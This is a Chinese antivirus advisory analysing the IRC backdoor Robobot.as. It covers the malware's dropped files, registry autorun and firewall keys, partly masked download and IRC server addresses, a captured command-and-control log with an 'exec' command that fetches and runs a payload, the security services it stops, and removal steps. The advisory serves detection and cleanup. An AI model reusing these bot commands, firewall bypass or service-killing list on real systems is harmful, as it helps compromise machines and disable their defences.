病毒名称： Backdoor.Win32.Robobot.as
病毒类型： 后门类
文件 MD5： 336E561DCDC23C4BD447394AB4DFC71D
公开范围： 完全公开
危害等级： 4
文件长度： 脱壳前 29,184 字节，脱壳后88,576 字节
感染系统： windows 9X以上版本
开发工具： Microsoft Visual C++ 7.0
加壳工具： UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

　　 该病毒运行后，连接网络下载病毒体到本机运行。添加注册表自动运行项以随系统引导病毒体。病毒运行后监听网络，等待接收指令。受感染用户可能会被利用进行各种恶操作。

1 、 衍生病毒文件：

　　　　%WinDir%\system\smss.exe
　　　　%Documents and Settings%\ 当前用户名
　　　　\Local Settings\Temp\2exinjs.aa.exe
　　　　
2 、 新建下列册表键值：

　　　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　　　　\Windows\CurrentVersion\Run\.nvsvc
　　　　Value: String: "%WinDir\system\smss.exe /w"

3 、 连接下列地址下载病毒体：

　　　　ads6.o*er**z.com（66.197.23*.3*） /*p/i*js.*a.exe

4、 连接的 IRC 服务器地址：

　　　　numegaserver （66.7.2*0.24*）

5、 连接 IRC 服务器后的交互如下：

　　　　NICK jfac-1_9127_1268
　　　　USER jfac-1_9127_1268
　　　　"jfac-1_9127_1268"
　　　　"in.pharmlod.com"
　　　　:jfac-1_9127_1268
　　　　:numegaserver 001
　　　　jfac-1_9127_1268
　　　　:Welcome to the SOMEnet IRC Network
　　　　jfac-1_9127_1268!~jfac-1_91@222.171.7.213

　　　　:numegaserver 002 jfac-1_9127_1268
　　　　:Your host is numegaserver, running version
　　　　ircd(Bahamut-1.4.35)-1.1(01)-02

　　　　:numegaserver 003 jfac-1_9127_1268
　　　　:This server was created Thu Feb 8 2007
　　　　at 15:11:12 UTC

　　　　:numegaserver 004
　　　　jfac-1_9127_1268
　　　　numegaserver ircd
　　　　(Bahamut-1.4.35)-1.1(01)-
　　　　02 oOiwscrRkKnfydaAbgheFjH
　　　　biklLmMnoprRstvc7BeEwxX

　　　　:numegaserver 005
　　　　jfac-1_9127_1268
　　　　NOQUIT WATCH=128 SAFELIST MODES=6
　　　　MAXCHANNELS=20 MAXBANS=100
　　　　NICKLEN=30 CHANNELLEN=32
　　　　TOPICLEN=307 KICKLEN=307
　　　　CHANTYPES=# PREFIX=(ov)@+
　　　　STATUSMSG=@+ NETWORK=SOMEnet
　　　　SILENCE=10 EXCEPTS
　　　　CHARSET=ascii
　　　　CHANMODES=bBeEX,k,l,7chiLmMnOprRstwx
　　　　CODEPAGES 8BNICKS=YES
　　　　MANICKS=YES MAWNICKS=YES
　　　　8BNCI=YES 8BCNCI=YES
　　　　NICKIDEN :are available
　　　　on this server
　　　　// 服务器返回信息
　　　　:numegaserver 251 jfac-1_9127_1268
　　　　:There are 28 users and 0 invisible
　　　　on 1 servers
　　　　:numegaserver 255 jfac-1_9127_1268
　　　　:I have 28 clients and 0 servers
　　　　:numegaserver 265 jfac-1_9127_1268
　　　　:Current local users: 28 Max: 39
　　　　:numegaserver 266 jfac-1_9127_1268
　　　　:Current global users: 28 Max: 39
　　　　:numegaserver 422 jfac-1_9127_1268
　　　　:MOTD File is missing
　　　　:jfac-1_9127_1268 MODE jfac-1_9127_1268
　　　　:+i
　　　　// 下载文件
　　　　:numegaserver 700
　　　　jfac-1_9127_1268 ISO8859-5
　　　　:is now your translation scheme
　　　　:inj1!~devel@66.7.200.245 PRIVMSG
　　　　jfac-1_9127_1268 :exec
　　　　http://ads6.op***uz.com/*p
　　　　/i**s.aa.exe?*fa*-1_9*27_12*8
　　　　i*j*.*a.exe 1**8
　　　　// 保持连接
　　　　PING :numegaserver
　　　　PONG :PING :numegaserver
　　　　PONG :

6、 此文件用来监听网络：

　　　　%Documents and Settings%\ 当前用户名
　　　　\Local Settings\Temp\2exinjs.aa.exe

7 、病毒可能会修改下列注册表键值以穿过 Windows 防火墙：

　　　　HKLM\SYSTEM\CurrentControlSet
　　　　\Services\SharedAccess\Parameters
　　　　\FirewallPolicy\StandardProfile
　　　　\AuthorizedApplications\List',键值:0

8 、病毒试图关闭或停止下列安全服务：

　　　　KAVPersonal50
　　　　Wuauserv
　　　　Navaps
　　　　Symantec Core LC
　　　　SAVScan
　　　　Kavsvc
　　　　Wscsvc

注： % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:\Winnt\System32 ， windows95/98/me 中默认的安装路径是 C:\Windows\System ， windowsXP 中默认的安装路径是 C:\Windows\System32 。

1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、 手工清除请按照行为分析删除对应文件，恢复相关系统设置。
　 　 (1) 使用安天木马防线断开网络，结束病毒进程：
　　　　　　%WinDir%\system\smss.exe
　　　　　　%Documents and Settings%\ 当前用户名
　　　　　　\Local Settings\Temp\2exinjs.aa.exe
　 　 (2) 删除并恢复病毒添加与修改的注册表键值：
　　　　　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
　　　　　　\Windows\CurrentVersion\Run\.nvsvc 　　　　　　
　　　　　　Value: String: "%WinDir\system
　　　　　　\smss.exe /w"
　 　 (3)恢复病毒修改的注册表项目，删除病毒添加的注册表项。
　　　　　　HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
　　　　　　Windows\CurrentVersion\Run
　　　　　　键值 : 字串: " QQ " = " %WINDIR%\QQ.exe "
　 　 (4) 删除病毒释放文件：
　　　　　　%WinDir%\system\smss.exe
　　　　　　%Documents and Settings%\ 当前用户名
　　　　　　\Local Settings\Temp\2exinjs.aa.exe

点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net